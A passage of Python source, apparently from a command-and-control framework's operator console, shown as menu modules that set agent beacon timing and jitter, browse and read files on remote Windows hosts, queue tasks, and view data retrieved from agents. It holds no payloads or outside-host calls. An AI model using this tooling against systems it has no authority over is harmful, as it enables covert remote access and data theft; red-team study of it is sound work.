helpers\n self.selected_agent = selected_agent\n self.pathvar = PureWindowsPath(\"c:/\")\n super().__init__()\n while len(self.helpers.rccommands) > 0:\n if self.onecmd(self.helpers.rccommands.pop(0)) is True:\n self.ranAuto = True\n return\n completekey = 'tab'\n\n def precmd(self, line): # Added for operator logging\n self.helpers.operatorlog(str(\" \"+line), False)\n return(line)\n\n def emptyline(self):\n \"\"\"Called when an empty line is entered in response to the prompt.\n\n If this method is not overridden, it repeats the last nonempty\n command entered.\n\n \"\"\"\n if self.lastcmd:\n self.lastcmd = \"\"\n return self.onecmd('\\n')\n \n def do_back(self, inp):\n return True\n\n def help_back(self):\n print(\"Description: Goes back in the menu\")\n print(\"Usage: back\")\n \n def do_clear(self, inp):\n os.system('clear')\n \n def help_clear(self):\n print(\"Description: Clears the screen\")\n print(\"Usage: clear\")\n\n def do_refreshtime(self, inp):\n try:\n self.selected_agent.refreshtime = int(inp)\n self.helpers.save_agents_to_file()\n except ValueError:\n print(\"Enter a digit value: 1-99999\")\n \n def help_refreshtime(self):\n print(\"Description: Sets the refreshtime for the agent - specified in seconds\")\n print(\"Usage: refreshtime 360\")\n\n def do_jitter(self, inp):\n try:\n self.selected_agent.jitter = int(inp)\n self.helpers.save_agents_to_file()\n except ValueError:\n print(\"Enter a digit value: 1-99999\")\n \n def help_jitter(self):\n print(\"Description: Sets the jitter for the agent - specified in seconds\")\n print(\"Usage: jitter 360\")\n\n def do_pushnextcallback(self, inp):\n self.selected_agent.pushnextcallback = True\n \n def help_pushnextcallback(self):\n print(\"Description: Enables pushover notification on next callback from agent\")\n\n def do_ls(self, inp):\n try:\n mod = self.helpers.get_module('operation/file/list_dir')\n mod.options['recurselevels']['value'] = \"0\"\n mod.options['filetype']['value'] = \"*\"\n mod.options['filename']['value'] = \"*\"\n mod.options['nodirectories']['value'] = \"False\"\n mod.options['nofiles']['value'] = \"False\"\n mod.options['sizeformat']['value'] = \"mb\"\n mod.options['output_console']['value'] = \"True\"\n mod.options['directory']['value'] = str(self.pathvar)\n task = TaskClass('operation/file/list_dir',\n self.helpers.renderModule(mod, self.selected_agent),\n mod.entry,\n copy.deepcopy(mod.options),\n True)\n self.selected_agent.add_task(task)\n except Exception as msg:\n print(\" *** Error processing input: {}\".format(msg))\n \n def help_ls(self):\n print(\"Description: List out directory and files from the current directory\")\n print(\"Usage: ls\")\n\n def do_cd(self, inp):\n try:\n if inp == \"..\":\n self.pathvar = PureWindowsPath(self.pathvar.parent)\n elif inp == \"\\\\\":\n self.pathvar = PureWindowsPath(self.pathvar.anchor)\n else:\n self.pathvar = PureWindowsPath(self.pathvar,inp)\n except Exception as msg:\n print(\" *** Error processing input: {}\".format(msg))\n \n def help_cd(self):\n print(\"Description: Change directory\")\n print(\"Usage: cd temp\")\n print(\"Usage: cd.. or cd ..\")\n print(\"Usage: cd \\\\\")\n\n def do_pwd(self, inp):\n try:\n print(str(self.pathvar))\n except Exception as msg:\n print(\" *** Error processing input: {}\".format(msg))\n \n def help_pwd(self):\n print(\"Description: Change directory\")\n print(\"Usage: cd temp\")\n print(\"Usage: cd..\")\n\n def do_cat(self, inp):\n try:\n file = PureWindowsPath(self.pathvar,inp)\n mod = self.helpers.get_module('operation/file/cat_file')\n mod.options['file']['value'] = str(file)\n mod.options['output_console']['value'] = \"True\"\n task = TaskClass('operation/file/cat_file',\n self.helpers.renderModule(mod, self.selected_agent),\n mod.entry,\n copy.deepcopy(mod.options),\n True)\n self.selected_agent.add_task(task)\n except Exception as msg:\n print(\" *** Error processing input: {}\".format(msg))\n \n def help_cat(self):\n print(\"Description: Does Cat on the file to the screen. It uses the current path (pwd)+whatyoutype\")\n print(\"Usage: cat file.txt\")" }, { "path": "lib/menu/specpromptinteract.py", "content": "\nimport os\nimport cmd\nimport traceback\nfrom datetime import datetime\nfrom lib.core.setup import gconfig\nfrom lib.core.helpers import Helpers\nfrom lib.menu.specpromptmodule import SpecPromptModule\nfrom lib.menu.specpromptexplorer import SpecPromptExplorer\nclass SpecPromptInteract(cmd.Cmd):\n def __init__(self, selected_agent, helpers):\n self.ranAuto = False\n self.helpers = helpers\n self.selected_agent = selected_agent\n super().__init__()\n while len(self.helpers.rccommands) > 0:\n if self.onecmd(self.helpers.rccommands.pop(0)) is True:\n self.ranAuto = True\n return\n completekey = 'tab'\n\n def precmd(self, line): # Added for operator logging\n self.helpers.operatorlog(str(\" \"+line), False)\n return(line)\n\n def emptyline(self):\n \"\"\"Called when an empty line is entered in response to the prompt.\n\n If this method is not overridden, it repeats the last nonempty\n command entered.\n\n \"\"\"\n if self.lastcmd:\n self.lastcmd = \"\"\n return self.onecmd('\\n')\n \n def do_back(self, inp):\n return True\n\n def help_back(self):\n print(\"Description: Goes back in the menu\")\n print(\"Usage: back\")\n \n def do_info(self, inp):\n outlist = {}\n try:\n for value in vars(self.selected_agent):\n if value == \"encryptedvbsfunctions\":\n pass\n elif value == \"tasks\":\n outlist.update( {\"tasks in queue\" : len(self.selected_agent.tasks) })\n else:\n outlist.update( {value : str(vars(self.selected_agent)[value]) })\n for key,val in sorted(outlist.items()):\n print(\"{} : {}\".format(key,val) , end=\"\\n\")\n except ValueError:\n print(\"Something went wrong...Not sure what\")\n\n def help_info(self):\n print(\"Description: Lists out all agent properties\")\n print(\"Usage: info\")\n\n def do_clear(self, inp):\n os.system('clear')\n \n def help_clear(self):\n print(\"Description: Clears the screen\")\n print(\"Usage: clear\")\n\n def do_clearagentdata(self, inp):\n while 1:\n confirm = input(\"Are you sure you want to delete agentdata from:\\n\" + self.selected_agent.hostname + \"\\nYou will not be able to recover this data after you answer yes. \\n\\nYou have been WARNED!\\n\\nType YES to confirm (needs to be uppercase) - Anything else will exit without deleting\\nThis will delete the content inside the txt file in the agent_data folder\\n\")\n if confirm == \"YES\":\n open(\"agent_data/\" + self.selected_agent.hostname + \".txt\", \"w\").close()\n break\n else:\n break\n return True\n \n def help_clearagentdata(self):\n print(\"Description: Deletes the agents data in the agentdata folder\")\n print(\"Usage: clearagentdata\")\n\n def do_delete(self, inp):\n while 1:\n confirm = input(\"Are you sure you want to delete:\\n\" + self.selected_agent.hostname + \" \" + self.selected_agent.username + \" \" + self.selected_agent.remoteip + \"\\n\\nA PREFERRED WAY WOULD BE TO RUN THE TASK: Exe - Remove Homepage.\\nYou will not be able to recover this agent after you answer yes. \\n\\nYou have been WARNED!\\n\\nType YES to confirm (needs to be uppercase) - Anything else will exit without deleting\\nThis will not delete txt files in agent_data folder\\n\")\n if confirm == \"YES\":\n self.helpers.a_list.remove(self.selected_agent)\n self.helpers.save_agents_to_file()\n break\n else:\n break\n return True\n \n def help_delete(self):\n print(\"Description: Delete this agent completly from the database, will NOT delete data file in the agents_data folder\")\n print(\"Usage: delete\")\n\n def do_refreshtime(self, inp):\n try:\n self.selected_agent.refreshtime = int(inp)\n self.helpers.save_agents_to_file()\n except ValueError:\n print(\"Enter a digit value: 1-99999\")\n \n def help_refreshtime(self):\n print(\"Description: Sets the refreshtime for the agent - specified in seconds\")\n print(\"Usage: refreshtime 360\")\n\n def do_jitter(self, inp):\n try:\n self.selected_agent.jitter = int(inp)\n self.helpers.save_agents_to_file()\n except ValueError:\n print(\"Enter a digit value: 1-99999\")\n \n def help_jitter(self):\n print(\"Description: Sets the jitter for the agent - specified in seconds\")\n print(\"Usage: jitter 360\")\n\n def do_data(self, inp):\n try:\n print(\"\\n*** Listing data for {}. ***\".format(self.selected_agent.hostname))\n print(open('./agent_data/'+self.selected_agent.hostname+'.txt', \"r\").read())\n except FileNotFoundError:\n print(\"File with data not found - verify that ./agent_data/{}.txt exists\".format(self.selected_agent.hostname))\n \n def help_data(self):\n print(\"Description: List out the data retrieved from the agent.\")\n print(\"Usage: data\")\n \n def do_qlist(self, inp):\n if len(self.selected_agent.tasks) == 0:\n print(\"Empty queue\")\n else:\n for item in self.selected_agent.tasks:\n print(\"Queue Item #{}\".format(self.selected_agent.tasks.index(item) +1))\n print(\"\\tModule Name:\\t{}\".format(item.name))\n print(\"\\tTime Added:\\t{}\".format(item.added))\n print(\"\\tTime Passed:\\t{}\".format(datetime.strptime(datetime.now().strftime(gconfig.TIME_FORMAT), gconfig.TIME_FORMAT)-datetime.strptime(item.added,gconfig.TIME_FORMAT)))\n if hasattr(item, 'status'):\n print(\"\\tstatus:\\t{}\".format(item.status))\n for arg in item.options.keys():\n if 'hidden' in item.options[arg] and item.options[arg]['hidden']:\n continue\n print(\"\\t{}:\\t{}\".format(arg, item.options[arg]['value']))\n print(\"\\n\")\n print(\"Agent Last check-in: {}\".format(self.selected_agent.lastcheckin))\n\n def help_qlist(self):\n print(\"Description: Lists out the current task queue for the agent\")\n print(\"Usage: qlist\")\n\n def do_qdel(self, inp):\n try:\n if inp == \"*\":\n print(\"Deleted all queued tasks\")\n del self.selected_agent.tasks[:]\n else:\n inp = int(inp) - 1 #starts a 0, queue lists from 1\n print(\"Deleting {}\".format(self.selected_agent.tasks[inp].name))\n self.selected_agent.tasks.pop(inp)\n self.helpers.save_agents_to_file()\n \n except SyntaxError:\n print(\"Not a valid number\")\n \n except ValueError:\n print(\"Enter a digit or * to delete all tasks in queue - see help\")\n\n except IndexError:\n print(\"Not a valid queue number - Use queue command to list\")\n\n def help_qdel(self):\n print(\"Description: Delete either specified task by id or all by specifying *\")\n print(\"Usage: qdel \")\n print(\"Usage: qdel *\")\n\n def do_usemodule(self, inp):\n try:\n selected_module = self.helpers.get_module(inp)\n i = SpecPromptModule(self.helpers, selected_module, self.selected_agent, self.prompt[:-1]+':'+inp+'>')\n if i.ranAuto:\n return\n i.cmdloop()\n except KeyError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except ValueError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except TypeError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except AttributeError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n\n\n def help_usemodule(self):\n print(\"Description: Interact with specified module\")\n print(\"Usage: usemodule \")\n\n def do_explorer(self, inp):\n try:\n #agent = self.helpers.a_list.get_agent(int(inp))\n i = SpecPromptExplorer(self.selected_agent, self.helpers)\n if i.ranAuto:\n return\n i.prompt = self.prompt[:-1]+':'+self.selected_agent.hostname+':Explorer>'\n i.cmdloop()\n except KeyError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except ValueError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except TypeError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n except AttributeError:\n traceback.print_exc()\n print(\"Error - Did you type a valid module name?\")\n\n\n def help_explorer(self):\n print(\"Description: Starts the explorer module\")\n print(\"Usage: explorer\")\n\n def do_pushnextcallback(self, inp):\n self.selected_agent.pushnextcallback = True\n \n def help_pushnextcallback(self):\n print(\"Description: Enables pushover notification on next callback from agent\")\n\n def complete_usemodule(self, text, line, begidx, endidx):\n return [i for i in self.helpers.modlist.keys() if i.startswith(text)]\n\n def do_runTaskBook(self, cmd):\n try:\n if not (self.selected_agent.encryptionkey):\n print(\"Agent does not have an encryption key yet. Cannot queue tasks before it is a fully agent\")\n return False\n task = self.helpers.taskbooks[cmd]\n task.TaskBook(self.helpers, self.selected_agent)\n except KeyError:\n traceback.print_exc()\n print(\"Error - Did you type a valid taskbook name?\")\n except Exception as msg:\n traceback.print_exc()\n print(\"handled error running taskbook: {}\".format(msg))\n\n def complete_runTaskBook(self, text, line, begidx, endidx):\n return [i for i in self.helpers.taskbooks.keys() if i.startswith(text)]\n\n def help_runTaskbook(self):\n print(\"Usage: runTaskbook \")" }, { "path": "lib/menu/specpromptmodule.py", "content": "import copy\nimport os\nimport cmd\nimport traceback\n\nfrom lib.core.utility import TaskClass\nfrom lib.core.helpers import Helpers\n\nclass SpecPromptModule(cmd.Cmd):\n def __init__(self, helpers, selected_module, selected_agent, prompt):\n self.ranAuto = False\n self.selected_module = selected_module\n self.selected_agent = selected_agent\n self.helpers = helpers\n self.prompt = prompt\n super().__init__()\n while len(self.helpers.rccommands) > 0:\n if self.onecmd(self.helpers.rccommands.pop(0)) is True:\n self.ranAuto = True\n return\n\n completekey = 'tab'\n\n def precmd(self, line): # Added for operator logging\n self.helpers.operatorlog(str(\" \"+line), False)\n return(line)\n\n #def preloop(self):\n # #Define a task\n # self.task = TaskClass(self.selected_module.name, self.selected_module.category, self.selected_module.subcat, self.selected_module.funcname, self.selected_module.args)\n # self.do_options(\"display\")\n # with open('random.txt', 'a') as file:\n # file.write('This is a line of text to append to the file.\\n')\n\n \n\n def emptyline(self):\n \"\"\"Called when an empty line is entered in response to the prompt.\n\n If this method is not overridden, it repeats the last nonempty\n command entered.\n\n \"\"\"\n if self.lastcmd:\n self.lastcmd = \"\"\n return self.onecmd('\\n')\n\n def do_back(self, inp):\n return True\n \n def help_back(self):\n print(\"Description: Goes back in the menu\")\n print(\"Usage: back\")\n\n def do_options(self, cmd):\n print(\"Module Help/Description: \\n\\t{}\".format(self.selected_module.help))\n for k, v in self.selected_module.options.items():\n if 'hidden' in v and v['hidden'] is True:\n continue\n print(\"\\n {}\\n\\tValue: {}\\n\\tRequired: {}\\n\\tDescription: {}\".format(k, v['value'], v['required'],\n v['description']))\n print(\"\\nUse set to change any presented options above. If you do not see options, you can't configure this module\")\n \n def help_options(self):\n print(\"Description: Shows the module options that are currently set\")\n print(\"Usage: options\")\n\n def do_set(self, cmd):\n \"\"\"set PROFILE testprofile\n sets option for handler.\"\"\"\n try:\n mykey = cmd.split(\" \")[0].strip()\n myvalue = cmd.replace(\"%s \" % (mykey), \"\")\n if mykey in list(self.selected_module.options.keys()):\n self.selected_module.set_option(mykey, myvalue)\n else:\n print(\" *** Invalid value : %s\" % (mykey))\n except Exception as msg:\n print(\" *** Error processing input: {}\".format(msg))\n\n def complete_set(self, text, line, start_index, end_index):\n arguments = self.helpers.getarguments(line)\n keylist = set(self.selected_module.options.keys())\n filter = set()\n for key in keylist:\n if 'hidden' in self.selected_module.options[key] and self.selected_module.options[key]['hidden'] is True:\n filter.add(key)\n keylist = list(keylist - filter)\n if len(arguments) > 1:\n arguments.pop(0)\n if arguments[0] in keylist:\n if 'tab_complete' in self.selected_module.options[arguments[0]]:\n args = {}\n if 'tab_args' in self.selected_module.options[arguments[0]]:\n args = self.selected_module.options[arguments[0]]['tab_args']\n if not isinstance(args, dict):\n print(\" *** tab_args for argument {} is invalid\".format(arguments[0]))\n args = {}\n return self.selected_module.options[arguments[0]]['tab_complete'](text, line, **args)\n else:\n if text:\n return [\n name for name in keylist\n if name.startswith(text)\n ]\n else:\n return keylist\n \n def help_set(self):\n print(\"Description: Allows you to set the different options for the module\")\n print(\"Usage: set